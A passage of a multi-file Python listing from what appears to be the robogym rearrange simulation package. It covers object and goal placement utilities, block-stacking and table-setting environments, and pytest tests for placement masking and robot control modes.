relative to the world frame and a boolean indicating whether the placement is valid.
"""
def _get_placement_proposal(object_idx):
# randomly place the object within the bounds
pos, size = object_bounding_boxes[object_idx]
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
x, y = random_state.uniform(
low=(size[0], size[1]), high=(width - size[0], height - size[1])
)
x -= pos[0]
y -= pos[1]
return x, y
return _place_objects(
object_bounding_boxes,
table_dimensions,
placement_area,
_get_placement_proposal,
max_placement_trial_count,
max_placement_trial_count_per_object,
)
def place_targets_with_fixed_position(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
target_placements: np.ndarray,
):
"""
Place target object according to specified placement positions.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects
:param target_placements: Placement positions (x, y) relative to the placement area. Normalized
to [0, 1]
:return: Global placement positions (x, y, z) for all objects.
"""
def _get_placement_proposal(object_idx):
width, height, _ = placement_area.size
return target_placements[object_idx] * [width, height]
return _place_objects(
object_bounding_boxes,
table_dimensions,
placement_area,
_get_placement_proposal,
max_placement_trial_count=1,
max_placement_trial_count_per_object=1,
run_collision_check=False,
)
def place_targets_with_goal_distance_ratio(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
object_placements: np.ndarray,
goal_distance_ratio: float,
goal_distance_min: float,
max_placement_trial_count: int,
max_placement_trial_count_per_object: int,
random_state: np.random.RandomState,
) -> Tuple[np.ndarray, bool]:
"""
Place targets around objects with goal distance.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects
:param object_placements: placements of boxes - this is the result of place_objects
:param goal_distance_ratio: the goal is uniformly sampled first and then the distance between
the object and the goal is shrunk. The shrunk distance is the original distance times
goal_distance_ratio.
:param goal_distance_min: minimum goal distance to ensure that goal is not too close to the
object position.
:param max_placement_trial_count: To prevent an infinite placement loop,
max_placement_trial_count should be set to a finite positive number.
:param max_placement_trial_count_per_object: To prevent an infinite placement loop,
max_placement_trial_count_per_object should be set to a finite positive number.
:param random_state: numpy RandomState to use for sampling
:return: np.ndarray of size (num_objects, 3) where columns are x, y, z coordinates of objects
and a boolean indicating whether the placement is valid.
"""
def _get_placement_proposal(object_idx):
# Sample goal position relative to table area
pos, size = object_bounding_boxes[object_idx]
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
gx, gy = random_state.uniform(
low=(size[0], size[1]), high=(width - size[0], height - size[1])
)
# Retrieve object position relative to table area
table_pos, table_size, table_height = table_dimensions
object_place = (
object_placements[object_idx]
- [offset_x, offset_y, 0.0]
+ table_size
- table_pos
)
x = object_place[0] + pos[0]
y = object_place[1] + pos[1]
# Pull goal position close to the object position
dist = np.linalg.norm([gx - x, gy - y])
min_ratio = goal_distance_min / dist if dist >= goal_distance_min else 0.0
ratio = np.clip(goal_distance_ratio, min_ratio, 1.0)
gx = x + (gx - x) * ratio
gy = y + (gy - y) * ratio
return gx - pos[0], gy - pos[1]
return _place_objects(
object_bounding_boxes,
table_dimensions,
placement_area,
_get_placement_proposal,
max_placement_trial_count,
max_placement_trial_count_per_object,
)
def find_meshes_by_dirname(root_mesh_dir) -> Dict[str, list]:
"""
Find all meshes under given mesh directory, grouped by top level
folder name.
:param root_mesh_dir: The root directory name for mesh files.
:return: {dir_name -> list of mesh files}
"""
root_path = os.path.join(ASSETS_DIR, "stls", root_mesh_dir)
all_stls = {}
for subdir in os.listdir(root_path):
curr_path = os.path.join(root_path, subdir)
if not os.path.isdir(curr_path) and not curr_path.endswith(".stl"):
continue
if curr_path.endswith(".stl"):
stls = [curr_path]
else:
stls = glob.glob(os.path.join(curr_path, "*.stl"))
assert len(stls) > 0
all_stls[subdir] = stls
assert len(all_stls) > 0
return all_stls
def find_stls(mesh_dir) -> List[str]:
return glob.glob(os.path.join(mesh_dir, "**", "*.stl"), recursive=True)
def load_all_materials() -> List[str]:
"""
Return the names of all material files under envs/rearrange/materials
"""
return [
os.path.splitext(os.path.basename(material_path))[0]
for material_path in glob.glob(os.path.join(MATERIAL_DIR, "*.jsonnet"))
]
# NOTE: Use lru_cache so that we don't have to re-compile material files over and over
@lru_cache()
def load_material_args(material_name: str) -> dict:
"""
Load mujoco args related to given material.
"""
material_path = os.path.join(MATERIAL_DIR, f"{material_name}.jsonnet")
return json.loads(_jsonnet.evaluate_file(material_path))
def safe_reset_env(
env, max_reset_retry_on_invalid_sim_error=100, only_reset_goal=False
) -> dict:
for i in range(max_reset_retry_on_invalid_sim_error):
try:
if only_reset_goal:
obs = env.reset_goal()
else:
obs = env.reset()
except InvalidSimulationError:
if i == max_reset_retry_on_invalid_sim_error - 1:
raise RuntimeError(
f"Too many consecutive env reset error:"
f" {max_reset_retry_on_invalid_sim_error} times"
)
else:
break
return obs
def rotate_bounding_box(
bounding_box: np.ndarray, quat: np.ndarray
) -> Tuple[float, float]:
""" Rotates a bounding box by applying the quaternion and then re-computing the tightest
possible fit of an *axis-aligned* bounding box.
"""
pos, size = bounding_box
# Compute 8 corners of bounding box.
signs = np.array([[x, y, z] for x in [-1, 1] for y in [-1, 1] for z in [-1, 1]])
corners = pos + signs * size
assert corners.shape == (8, 3)
# Rotate corners.
mat = quat2mat(quat)
rotated_corners = corners @ mat
# Re-compute bounding-box.
min_xyz = np.min(rotated_corners, axis=0)
max_xyz = np.max(rotated_corners, axis=0)
size = (max_xyz - min_xyz) / 2.0
assert np.all(size >= 0.0)
pos = min_xyz + size
return pos, size
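# Example: a box with half-size (1, 1, 1) centered at the origin, rotated 45 degrees
# about z, gets an axis-aligned half-size of roughly (1.414, 1.414, 1.0) while its
# center position stays at the origin.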
def update_object_z_coordinate(
position: np.ndarray,
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
) -> np.ndarray:
"""
Update object z positions based on bounding boxes. If an object is rotated, the z position
that was computed to place it on top of the table can become invalid. This method recomputes
the z position from up-to-date bounding box information.
:param position: position of objects (num_objects, 3) where the second dimension of the
tensor corresponds to (x, y, z) world coordinates of each object.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:return: position of objects (num_objects, 3) with updated z coordinate
"""
table_pos, table_size, table_height = table_dimensions
n_objects = object_bounding_boxes.shape[0]
updated = position.copy()
for i in range(n_objects):
center, size = object_bounding_boxes[i]
updated[i, -1] = size[-1] - center[-1] + table_size[-1] + table_pos[-1]
return updated
```
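Most of `place_objects_in_grid` above is bookkeeping: cell dimensions come from the largest object footprint, and objects are dealt into shuffled cells. A self-contained sketch of just that arithmetic (hypothetical helper, plain numpy, no MuJoCo):
```python
import numpy as np

def grid_cells(placement_size, object_half_extents, random_state):
    """Return shuffled (row, col) cells and the cell size for a grid that can hold
    every object, or None if the placement area is too small.

    placement_size: (width, height) of the placement area.
    object_half_extents: (n_objects, 2) half-width / half-height per object.
    """
    width, height = placement_size
    max_w, max_h = 2 * object_half_extents.max(axis=0)  # largest full-size footprint
    n_cols, n_rows = int(width // max_w), int(height // max_h)
    if n_cols * n_rows < len(object_half_extents):
        return None  # mirrors the early return in place_objects_in_grid
    coords = np.dstack(np.mgrid[0:n_rows, 0:n_cols]).reshape(-1, 2)
    random_state.shuffle(coords)
    return coords, (width / n_cols, height / n_rows)

rs = np.random.RandomState(0)
cells, cell_size = grid_cells((4.0, 3.0), np.full((4, 2), 0.5), rs)
assert len(cells) == 12 and cell_size == (1.0, 1.0)
```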
#### File: datasets/envstates/utils.py
```python
from typing import Dict
from numpy.random.mtrand import RandomState
from robogym.envs.rearrange.datasets.objects.base import ObjectDataset
from robogym.utils.env_utils import get_function
def get_envstate_datasets(
dataset_config: Dict[str, dict],
object_datasets: Dict[str, ObjectDataset],
random_state: RandomState,
):
datasets = {}
for key in dataset_config:
datasets[key] = get_function(dataset_config[key])(
object_datasets=object_datasets, random_state=random_state
)
return datasets
```
#### File: datasets/objects/utils.py
```python
from typing import Dict
from numpy.random.mtrand import RandomState
from robogym.utils.env_utils import get_function
def get_object_datasets(object_config: Dict[str, dict], random_state: RandomState):
datasets = {}
for key in object_config:
datasets[key] = get_function(object_config[key])(random_state=random_state)
return datasets
```
#### File: rearrange/goals/object_stack_goal.py
```python
from typing import Dict, Tuple, Union
import numpy as np
from numpy.random import RandomState
from robogym.envs.rearrange.common.utils import place_objects_with_no_constraint
from robogym.envs.rearrange.goals.object_state import GoalArgs, ObjectStateGoal
from robogym.envs.rearrange.simulation.base import RearrangeSimulationInterface
from robogym.utils import rotation
class ObjectStackGoal(ObjectStateGoal):
def __init__(
self,
mujoco_simulation: RearrangeSimulationInterface,
args: Union[Dict, GoalArgs] = GoalArgs(),
fixed_order: bool = True,
):
"""
:param fixed_order: if True, objects are stacked in a fixed order; otherwise the
stacking order is shuffled randomly.
"""
super().__init__(mujoco_simulation, args)
self.fixed_order = fixed_order
def _sample_next_goal_positions(
self, random_state: RandomState
) -> Tuple[np.ndarray, bool]:
# place only bottom object
bottom_positions, goal_valid = place_objects_with_no_constraint(
self.mujoco_simulation.get_object_bounding_boxes()[:1],
self.mujoco_simulation.get_table_dimensions(),
self.mujoco_simulation.get_placement_area(),
max_placement_trial_count=self.mujoco_simulation.max_placement_retry,
max_placement_trial_count_per_object=self.mujoco_simulation.max_placement_retry_per_object,
random_state=random_state,
)
goal_positions = np.repeat(
bottom_positions, self.mujoco_simulation.num_objects, axis=0
)
object_size = self.mujoco_simulation.simulation_params.object_size
block_orders = list(range(self.mujoco_simulation.num_objects))
if not self.fixed_order:
random_state.shuffle(block_orders)
bottom_block_idx = block_orders[0]
goal_positions[bottom_block_idx] = bottom_positions[0]
for i in range(1, self.mujoco_simulation.num_objects):
new_pos = bottom_positions[0].copy()
new_pos[2] += i * object_size * 2
goal_positions[block_orders[i]] = new_pos
return goal_positions, goal_valid
def is_object_grasped(self):
grasped = self.mujoco_simulation.get_object_gripper_contact()
# In teleop, an object can sometimes be grasped even though MuJoCo detects contact on only one gripper finger.
return np.array([x[0] + x[1] for x in grasped])
def relative_goal(self, goal_state: dict, current_state: dict) -> dict:
gripper_pos = current_state["obj_pos"] - current_state["gripper_pos"]
obj_pos = goal_state["obj_pos"] - current_state["obj_pos"]
return {
"obj_pos": obj_pos,
"gripper_pos": gripper_pos,
"obj_rot": self.rot_dist_func(goal_state, current_state),
}
def current_state(self) -> dict:
gripper_pos = self.mujoco_simulation.mj_sim.data.get_site_xpos(
"robot0:grip"
).copy()
gripper_pos = np.array([gripper_pos])
current_state = super().current_state()
current_state.update(
{"gripper_pos": gripper_pos, "grasped": self.is_object_grasped()}
)
return current_state
def goal_distance(self, goal_state: dict, current_state: dict) -> dict:
relative_goal = self.relative_goal(goal_state, current_state)
pos_distances = np.linalg.norm(relative_goal["obj_pos"], axis=-1)
gripper_distances = np.linalg.norm(relative_goal["gripper_pos"], axis=-1)
rot_distances = rotation.quat_magnitude(
rotation.quat_normalize(rotation.euler2quat(relative_goal["obj_rot"]))
)
return {
"relative_goal": relative_goal.copy(),
"gripper_pos": gripper_distances,
"obj_pos": pos_distances,
"obj_rot": rot_distances,
"grasped": current_state["grasped"],
}
```
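The stacking goal above amounts to: place the bottom object, then put every other object directly above it, one full block height (2 × half-size) per level, in a possibly shuffled order. A toy numpy sketch of that position construction (hypothetical helper, scalar half-size assumed as in the code above):
```python
import numpy as np

def stacked_goal_positions(bottom_pos, num_objects, object_half_size, order):
    # Start with every object at the bottom position, then raise each by its level.
    goals = np.repeat(bottom_pos[None, :], num_objects, axis=0)
    for level, obj_idx in enumerate(order):
        goals[obj_idx] = bottom_pos + [0.0, 0.0, level * 2 * object_half_size]
    return goals

goals = stacked_goal_positions(np.array([0.1, 0.2, 0.5]), 3, 0.025, order=[2, 0, 1])
# Object 2 sits on the table, object 0 on top of it, object 1 on top of that.
assert np.allclose(goals[2], [0.1, 0.2, 0.5])
assert np.allclose(goals[0], [0.1, 0.2, 0.55])
assert np.allclose(goals[1], [0.1, 0.2, 0.6])
```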
#### File: envs/rearrange/holdout.py
```python
import os
from typing import Dict, List, Optional, cast
import attr
import numpy as np
from robogym.envs.rearrange.common.base import (
RearrangeEnv,
RearrangeEnvConstants,
RearrangeEnvParameters,
)
from robogym.envs.rearrange.goals.holdout_object_state import (
HoldoutGoalArgs,
HoldoutObjectStateGoal,
)
from robogym.envs.rearrange.holdouts import STATE_DIR
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
from robogym.envs.rearrange.simulation.holdout import (
HoldoutRearrangeSim,
HoldoutRearrangeSimParameters,
)
from robogym.robot_env import build_nested_attr
@attr.s(auto_attribs=True)
class HoldoutRearrangeEnvConstants(RearrangeEnvConstants):
# Path to file storing initial state of objects.
# If not specified, initial state will be randomly sampled.
initial_state_path: Optional[str] = None
goal_args: HoldoutGoalArgs = build_nested_attr(HoldoutGoalArgs)
randomize_target: bool = False
@attr.s(auto_attribs=True)
class HoldoutRearrangeEnvParameters(RearrangeEnvParameters):
simulation_params: HoldoutRearrangeSimParameters = build_nested_attr(
HoldoutRearrangeSimParameters
)
# Holdout envs should use explicitly defined materials without randomization.
material_names: Optional[List[str]] = attr.ib(default=cast(List[str], []))
@material_names.validator
def validate_material_names(self, _, value):
assert not value, (
"Specifying material names for holdout in parameters is not supported. "
"Please specify material in jsonnet config directly."
)
class HoldoutRearrangeEnv(
RearrangeEnv[
HoldoutRearrangeEnvParameters,
HoldoutRearrangeEnvConstants,
HoldoutRearrangeSim,
]
):
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
# Create dummy object groups based on task object config so that reward
# function can take duplicated objects in holdouts into consideration.
object_groups = []
num_objects = self.parameters.simulation_params.num_objects
object_id = 0
for c in self.parameters.simulation_params.task_object_configs[:num_objects]:
object_group = ObjectGroupConfig(count=c.count)
# Set up object ids
object_group.object_ids = list(range(object_id, object_id + c.count))
object_id += c.count
object_groups.append(object_group)
return object_groups
def _sample_group_attributes(self, num_groups: int) -> Dict[str, list]:
# We don't set random attributes for object groups
return {}
def _apply_object_colors(self):
# We don't apply customized object colors.
pass
def _apply_object_size_scales(self):
# We don't apply customized object size scaling.
pass
def _randomize_object_initial_states(self):
if self.constants.initial_state_path:
initial_state = np.load(
os.path.join(STATE_DIR, self.constants.initial_state_path)
)
self.mujoco_simulation.set_object_pos(
initial_state["obj_pos"][: self.mujoco_simulation.num_objects]
)
self.mujoco_simulation.set_object_quat(
initial_state["obj_quat"][: self.mujoco_simulation.num_objects]
)
self.mujoco_simulation.forward()
else:
super()._randomize_object_initial_states()
@classmethod
def build_goal_generation(cls, constants, mujoco_simulation):
if constants.randomize_target:
return super().build_goal_generation(constants, mujoco_simulation)
else:
return HoldoutObjectStateGoal(mujoco_simulation, args=constants.goal_args)
make_env = HoldoutRearrangeEnv.build
```
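`_randomize_object_initial_states` above expects `initial_state_path` to point to an archive under `STATE_DIR` containing `obj_pos` and `obj_quat` arrays. A hedged sketch of how such a file could be produced; the file name and the object poses are made up for illustration:
```python
import numpy as np

# Two objects: positions of shape (num_objects, 3) and identity quaternions (num_objects, 4).
obj_pos = np.array([[1.45, 0.68, 0.5], [1.55, 0.68, 0.5]])
obj_quat = np.tile([1.0, 0.0, 0.0, 0.0], (2, 1))
np.savez("my_holdout_initial_state.npz", obj_pos=obj_pos, obj_quat=obj_quat)
```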
#### File: rearrange/simulation/blocks.py
```python
import attr
from robogym.envs.rearrange.common.utils import (
get_block_bounding_box,
make_blocks_and_targets,
)
from robogym.envs.rearrange.simulation.base import (
RearrangeSimParameters,
RearrangeSimulationInterface,
)
@attr.s(auto_attribs=True)
class BlockRearrangeSimParameters(RearrangeSimParameters):
# Appearance of the block. 'standard' blocks have plain faces without any texture or mark.
# 'openai' blocks have one of ['O', 'P', 'E', 'N', 'A', 'I'] on each face.
block_appearance: str = attr.ib(
default="standard", validator=attr.validators.in_(["standard", "openai"])
)
class BlockRearrangeSim(RearrangeSimulationInterface[BlockRearrangeSimParameters]):
"""
Move around blocks of different colors on the table.
"""
@classmethod
def make_objects_xml(cls, xml, simulation_params: BlockRearrangeSimParameters):
return make_blocks_and_targets(
simulation_params.num_objects,
simulation_params.object_size,
appearance=simulation_params.block_appearance,
)
def _get_bounding_box(self, object_name):
return get_block_bounding_box(self.mj_sim, object_name)
```
#### File: envs/rearrange/table_setting.py
```python
import logging
from typing import List
import attr
import numpy as np
from robogym.envs.rearrange.common.mesh import (
MeshRearrangeEnv,
MeshRearrangeEnvConstants,
MeshRearrangeEnvParameters,
MeshRearrangeSimParameters,
)
from robogym.envs.rearrange.goals.object_state_fixed import ObjectFixedStateGoal
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
from robogym.envs.rearrange.simulation.mesh import MeshRearrangeSim
from robogym.envs.rearrange.ycb import find_ycb_meshes
from robogym.robot_env import build_nested_attr
from robogym.utils.rotation import quat_from_angle_and_axis
logger = logging.getLogger(__name__)
@attr.s(auto_attribs=True)
class TableSettingRearrangeEnvParameters(MeshRearrangeEnvParameters):
simulation_params: MeshRearrangeSimParameters = build_nested_attr(
MeshRearrangeSimParameters, default=dict(num_objects=5)
)
class TableSettingRearrangeEnv(
MeshRearrangeEnv[
TableSettingRearrangeEnvParameters, MeshRearrangeEnvConstants, MeshRearrangeSim,
]
):
MESH_FILES = find_ycb_meshes()
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
return super()._sample_random_object_groups(dedupe_objects=True)
def _sample_object_colors(self, num_groups: int):
assert num_groups == 5
return [[0.99, 0.44, 0.35, 1.0]] + [[0.506, 0.675, 0.75, 1.0]] * 4
def _sample_object_size_scales(self, num_groups: int):
assert num_groups == 5
return [0.6, 0.53, 0.63, 0.6, 0.6]
def _sample_object_meshes(self, num_groups: int):
"""Add one plate, 2 forks, 1 spoon and 1 knife."""
return [
self.MESH_FILES[name]
for name in ["029_plate", "030_fork", "030_fork", "032_knife", "031_spoon"]
]
@classmethod
def build_goal_generation(cls, constants, mujoco_simulation):
return ObjectFixedStateGoal(
mujoco_simulation,
args=constants.goal_args,
relative_placements=np.array(
[
[0.6, 0.5], # "029_plate"
[0.6, 0.68], # "030_fork"
[0.6, 0.75], # "030_fork"
[0.6, 0.36], # "032_knife"
[0.6, 0.28], # "031_spoon"
]
),
init_quats=np.array(
[
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
# We need to rotate the spoon a little bit counter-clockwise to align it with the others.
quat_from_angle_and_axis(0.38, np.array([0, 0, 1.0])),
]
),
)
make_env = TableSettingRearrangeEnv.build
```
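The spoon's initial orientation above is built with `quat_from_angle_and_axis(0.38, [0, 0, 1])`, i.e. a 0.38-radian yaw. For reference, the underlying axis-angle-to-quaternion formula, sketched with plain numpy (the `(w, x, y, z)` ordering is an assumption):
```python
import numpy as np

def axis_angle_to_quat(angle, axis):
    # Unit quaternion (w, x, y, z) rotating by `angle` radians about `axis`.
    axis = np.asarray(axis, dtype=float)
    axis = axis / np.linalg.norm(axis)
    return np.concatenate([[np.cos(angle / 2.0)], np.sin(angle / 2.0) * axis])

print(axis_angle_to_quat(0.38, [0.0, 0.0, 1.0]))  # ~[0.982, 0, 0, 0.189]
```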
#### File: rearrange/tests/test_object_creation.py
```python
import numpy as np
from numpy.testing import assert_allclose
from robogym.envs.rearrange.common.utils import (
get_mesh_bounding_box,
make_block,
make_blocks_and_targets,
)
from robogym.envs.rearrange.simulation.composer import RandomMeshComposer
from robogym.mujoco.mujoco_xml import MujocoXML
def _get_default_xml():
xml_source = """
<mujoco>
<asset>
<material name="block_mat" specular="0" shininess="0.5" reflectance="0" rgba="1 0 0 1"></material>
</asset>
</mujoco>
"""
xml = MujocoXML.from_string(xml_source)
return xml
def test_mesh_composer():
for path in [
None,
RandomMeshComposer.GEOM_ASSET_PATH,
RandomMeshComposer.GEOM_ASSET_PATH,
]:
composer = RandomMeshComposer(mesh_path=path)
for num_geoms in range(1, 6):
xml = _get_default_xml()
composer.reset()
xml.append(composer.sample("object0", num_geoms, object_size=0.05))
sim = xml.build()
assert len(sim.model.geom_names) == num_geoms
pos, size = get_mesh_bounding_box(sim, "object0")
assert np.isclose(np.max(size), 0.05)
pos2, size2 = composer.get_bounding_box(sim, "object0")
assert np.allclose(pos, pos2)
assert np.allclose(size, size2)
def test_block_object():
xml = _get_default_xml()
xml.append(make_block("object0", object_size=np.ones(3) * 0.05))
sim = xml.build()
assert len(sim.model.geom_size) == 1
assert_allclose(sim.model.geom_size, 0.05)
def test_blocks_and_targets():
xml = _get_default_xml()
for obj_xml, target_xml in make_blocks_and_targets(num_objects=5, block_size=0.05):
xml.append(obj_xml)
xml.append(target_xml)
sim = xml.build()
assert len(sim.model.geom_size) == 10
assert_allclose(sim.model.geom_size, 0.05)
```
#### File: rearrange/tests/test_object_in_placement_area.py
```python
import numpy as np
import pytest
from robogym.envs.rearrange.blocks import make_env
KEYS_TO_MASK = [
"goal_obj_pos",
"goal_obj_rot",
"rel_goal_obj_pos",
"rel_goal_obj_rot",
"obj_pos",
"obj_rot",
"obj_rel_pos",
"obj_vel_pos",
"obj_vel_rot",
"obj_gripper_contact",
"obj_bbox_size",
"obj_colors",
]
@pytest.mark.parametrize(
"obj_pos,in_placement_area,margin",
[
([[1.45, 0.68, 0.5]], [True], 0.02), # Center of placement area.
([[1.15, 0.39, 0.5]], [True], 0.02), # top left in boundary
([[1.10, 0.39, 0.5]], [False], 0.02), # top left out of boundary
(
[[1.10, 0.39, 0.5]],
[True],
0.1,
), # top left close to boundary with a big margin
([[1.75, 0.97, 0.5]], [True], 0.02), # bottom right in boundary
([[1.80, 1.0, 0.5]], [False], 0.02), # bottom right out of boundary
([[1.15, 0.97, 0.5]], [True], 0.02), # top right in boundary
([[1.10, 1.0, 0.5]], [False], 0.02), # top right out of boundary
([[1.75, 0.39, 0.5]], [True], 0.02), # bottom left in boundary
([[1.75, 0.36, 0.5]], [False], 0.02), # bottom left out of boundary
(
[[1.75, 0.36, 0.5]],
[True],
0.1,
),  # bottom left close to boundary with a big margin
# Some combinations
([[1.15, 0.39, 0.5], [1.10, 0.39, 0.5]], [True, False], 0.02),
([[1.80, 1.0, 0.5], [1.15, 0.97, 0.5]], [False, True], 0.02),
(
[[1.80, 1.0, 0.5], [1.10, 1.0, 0.5], [1.75, 0.39, 0.5]],
[False, False, True],
0.02,
),
],
)
def test_single_obj_in_placement_area(obj_pos, in_placement_area, margin):
in_placement_area = np.array(in_placement_area)
n_obj = len(obj_pos)
max_obj = 12
env = make_env(
parameters={
"simulation_params": {"num_objects": n_obj, "max_num_objects": max_obj}
},
)
env.reset()
sim = env.unwrapped.mujoco_simulation
assert np.array_equal(
in_placement_area,
sim.check_objects_in_placement_area(np.array(obj_pos), margin=margin),
)
obj_pos_with_padding = np.array(obj_pos + list(np.zeros((max_obj - n_obj, 3))))
assert obj_pos_with_padding.shape == (max_obj, 3)
with_padding = sim.check_objects_in_placement_area(
obj_pos_with_padding, margin=margin
)
assert len(with_padding) == max_obj
assert np.array_equal(in_placement_area, with_padding[:n_obj])
assert np.all(in_placement_area[n_obj:])
no_padding = sim.check_objects_in_placement_area(np.array(obj_pos), margin=margin)
assert len(no_padding) == len(obj_pos)
assert np.array_equal(in_placement_area, no_padding)
@pytest.mark.parametrize("should_mask", [True, False])
@pytest.mark.parametrize(
"obj_pos,in_placement_area",
[
([[1.45, 0.68, 0.5]], [True]),
([[1.15, 0.39, 0.5], [1.10, 0.39, 0.5]], [True, False]),
([[1.80, 1.0, 0.5], [1.15, 0.97, 0.5]], [False, True]),
([[1.80, 1.0, 0.5], [1.10, 1.0, 0.5], [1.75, 0.39, 0.5]], [False, False, True]),
],
)
def test_mask_observation(obj_pos, in_placement_area, should_mask):
n_obj = len(obj_pos)
obj_pos = np.array(obj_pos)
in_placement_area_padded = np.array(in_placement_area + [True] * (3 - n_obj))
expected_mask = in_placement_area_padded.astype(float).reshape(-1, 1)
env = make_env(
parameters={"simulation_params": {"num_objects": n_obj, "max_num_objects": 3}},
constants={"mask_obs_outside_placement_area": should_mask},
)
env.reset()
env.unwrapped.mujoco_simulation.set_object_pos(np.array(obj_pos))
env.unwrapped.mujoco_simulation.forward()
env.unwrapped._goal["goal_objects_in_placement_area"] = in_placement_area_padded
obs = env.observe()
sim = env.unwrapped.mujoco_simulation
assert in_placement_area == list(sim.check_objects_in_placement_area(obj_pos))
for k in KEYS_TO_MASK:
masked_k = f"masked_{k}"
if not should_mask:
assert masked_k not in obs
else:
assert np.array_equal(obs["placement_mask"], expected_mask)
assert np.array_equal(obs["goal_placement_mask"], expected_mask)
for i in range(n_obj):
if in_placement_area[i]:
assert np.all(obs[masked_k][i] == obs[k][i])
else:
# if outside the placement area, mask it.
assert np.all(obs[masked_k][i] == np.zeros_like(obs[k][i]))
@pytest.mark.parametrize(
"obj_pos,in_placement_area",
[
(
[
[1.45, 0.68, 0.5], # in the middle of the placement area
[1.45, 0.395, 0.5], # on the left edge
[1.45, 0.34, 0.5], # within the margin
[1.45, 0.25, 0.5],
], # outside the margin
[True, True, None, False],
)
],
)
def test_soft_mask_observation(obj_pos, in_placement_area):
env = make_env(parameters={"simulation_params": {"num_objects": len(obj_pos)}})
env.reset()
sim = env.unwrapped.mujoco_simulation
stochastic_mask = set()
for _ in range(20):
mask = sim.check_objects_in_placement_area(
np.array(obj_pos), soft=True, margin=0.1
)
for i in range(len(in_placement_area)):
if in_placement_area[i] is None:
stochastic_mask.add(mask[i])
else:
assert in_placement_area[i] == mask[i]
assert len(stochastic_mask) == 2
```
#### File: rearrange/tests/test_robot_polymorphism.py
```python
import pytest
from robogym.envs.rearrange.blocks import make_env
from robogym.robot.composite.ur_gripper_arm import (
MujocoIdealURGripperCompositeRobot as IdealDynamicsCls,
)
from robogym.robot.composite.ur_gripper_arm import (
MujocoURTcpJointGripperCompositeRobot as JointDynamicsCls,
)
from robogym.robot.robot_interface import (
ControlMode,
RobotControlParameters,
TcpSolverMode,
)
from robogym.robot.ur16e.mujoco.free_dof_tcp_arm import (
FreeRollYawTcpArm,
FreeWristTcpArm,
)
def test_rearrange_defaults():
from robogym.robot.composite.ur_gripper_arm import (
MujocoURTcpJointGripperCompositeRobot,
)
env = make_env()
assert isinstance(env.robot, MujocoURTcpJointGripperCompositeRobot)
assert (
env.parameters.robot_control_params.max_position_change
== RobotControlParameters.default_max_pos_change_for_solver(
control_mode=ControlMode.TCP_ROLL_YAW,
tcp_solver_mode=TcpSolverMode.MOCAP_IK,
)
)
assert env.parameters.robot_control_params.arm_reset_controller_error
assert env.parameters.robot_control_params.control_mode is ControlMode.TCP_ROLL_YAW
assert env.parameters.robot_control_params.tcp_solver_mode is TcpSolverMode.MOCAP_IK
assert env.action_space.shape == (6,)
@pytest.mark.parametrize(
"control_mode, expected_action_dims, tcp_solver_mode, expected_main_robot, expected_helper_arm",
[
(
ControlMode.TCP_WRIST,
5,
TcpSolverMode.MOCAP,
IdealDynamicsCls,
FreeWristTcpArm,
),
(
ControlMode.TCP_WRIST,
5,
TcpSolverMode.MOCAP_IK,
JointDynamicsCls,
FreeWristTcpArm,
),
(
ControlMode.TCP_ROLL_YAW,
6,
TcpSolverMode.MOCAP,
IdealDynamicsCls,
FreeRollYawTcpArm,
),
(
ControlMode.TCP_ROLL_YAW,
6,
TcpSolverMode.MOCAP_IK,
JointDynamicsCls,
FreeRollYawTcpArm,
),
],
)
def test_rearrange_with_ur_tcp(
control_mode,
expected_action_dims,
tcp_solver_mode,
expected_main_robot,
expected_helper_arm,
):
env = make_env(
parameters=dict(
robot_control_params=dict(
control_mode=control_mode,
tcp_solver_mode=tcp_solver_mode,
max_position_change=0.1,
)
)
)
assert isinstance(env.robot, expected_main_robot)
assert isinstance(env.robot.robots[0].controller_arm, expected_helper_arm)
assert env.robot.robots[0].max_position_change == 0.1
assert env.robot.robots[1].max_position_change is None
assert env.action_space.shape == (expected_action_dims,)
assert env.robot.autostep is False, "Robot should not be in autostep mode"
def test_rearrange_sim_defaults():
env = make_env(
parameters=dict(
robot_control_params=dict(
control_mode=ControlMode.TCP_WRIST, tcp_solver_mode=TcpSolverMode.MOCAP,
),
)
)
assert env.robot.autostep is False
arm_robot = env.robot.robots[0]
assert (
arm_robot.simulation == arm_robot.controller_arm.simulation
), "Simulation should be shared"
assert (
arm_robot.controller_arm.autostep is False
), "Controller arm is not allowed to autostep"
def test_rearrange_with_ur_joint():
from robogym.robot.composite.ur_gripper_arm import (
MujocoURJointGripperCompositeRobot,
)
env = make_env(
parameters=dict(
robot_control_params=dict(
control_mode=ControlMode.JOINT, max_position_change=2.4,
)
)
)
assert isinstance(env.robot, MujocoURJointGripperCompositeRobot)
assert env.robot.robots[0].max_position_change == 2.4
assert env.robot.robots[1].max_position_change is None
